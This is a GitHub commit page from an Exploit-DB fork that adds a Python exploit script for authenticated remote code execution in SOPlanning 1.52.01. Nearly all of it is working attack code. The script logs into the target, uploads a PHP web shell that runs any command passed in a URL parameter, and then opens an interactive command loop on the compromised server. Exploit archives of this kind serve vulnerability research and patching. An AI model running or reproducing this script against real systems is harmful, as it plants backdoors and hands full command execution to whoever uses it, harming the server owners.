forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
2 changes to exploits/shellcodes/ghdb SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
- Loading branch information
Exploit-DB
committed
Nov 16, 2024
1 parent
b86fb6e
commit 773f5f4
Showing
2 changed files
with
77 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,76 @@ | ||
| # Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) | ||
| # Date: 6th October, 2024 | ||
| # Exploit Author: Ardayfio Samuel Nii Aryee | ||
| # Version: 1.52.01 | ||
| # Tested on: Ubuntu | ||
|
|
||
| import argparse | ||
| import requests | ||
| import random | ||
| import string | ||
| import urllib.parse | ||
|
|
||
| def command_shell(exploit_url): | ||
| commands = input("soplaning:~$ ") | ||
| encoded_command = urllib.parse.quote_plus(commands) | ||
|
|
||
| command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") | ||
| if command_res.status_code == 200: | ||
| print(f"{command_res.text}") | ||
| return | ||
| print(f"Error: An erros occured while running command: {encoded_command}") | ||
|
|
||
| def exploit(username, password, url): | ||
| target_url = f"{url}/process/login.php" | ||
| upload_url = f"{url}/process/upload.php" | ||
| link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6)) | ||
| php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php" | ||
|
|
||
| login_data = {"login":username,"password":password} | ||
| res = requests.post(target_url, data=login_data, allow_redirects=False) | ||
|
|
||
| cookies = res.cookies | ||
|
|
||
| multipart_form_data = { | ||
| "linkid": link_id, | ||
| "periodeid": 0, | ||
| "fichiers": php_filename, | ||
| "type": "upload" | ||
| } | ||
|
|
||
| web_shell = "<?php system($_GET['cmd']); ?>" | ||
|
|
||
| files = { | ||
| 'fichier-0': (php_filename, web_shell, 'application/x-php') | ||
| } | ||
| upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data) | ||
|
|
||
| if upload_res.status_code == 200 and "File" in upload_res.text: | ||
| print(f"[+] Uploaded ===> {upload_res.text}") | ||
| print("[+] Exploit completed.") | ||
| exploit_url = f"{url}/upload/files/{link_id}/{php_filename}" | ||
| print(f"Access webshell here: {exploit_url}?cmd=<command>") | ||
|
|
||
| if "yes" == input("Do you want an interactive shell? (yes/no) "): | ||
| try: | ||
| while True: | ||
| command_shell(exploit_url) | ||
| except Exception as e: | ||
| raise(f"Error: {e}") | ||
| else: | ||
| pass | ||
|
|
||
|
|
||
| def main(): | ||
| parser = argparse.ArgumentParser(prog="SOplanning RCE", \ | ||
| usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin") | ||
|
|
||
| parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True) | ||
| parser.add_argument("-u", "--username",type=str,help="username", required=True) | ||
| parser.add_argument("-p", "--password",type=str,help="password", required=True) | ||
|
|
||
| args = parser.parse_args() | ||
|
|
||
| exploit(args.username, args.password, args.target) | ||
|
|
||
| main() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters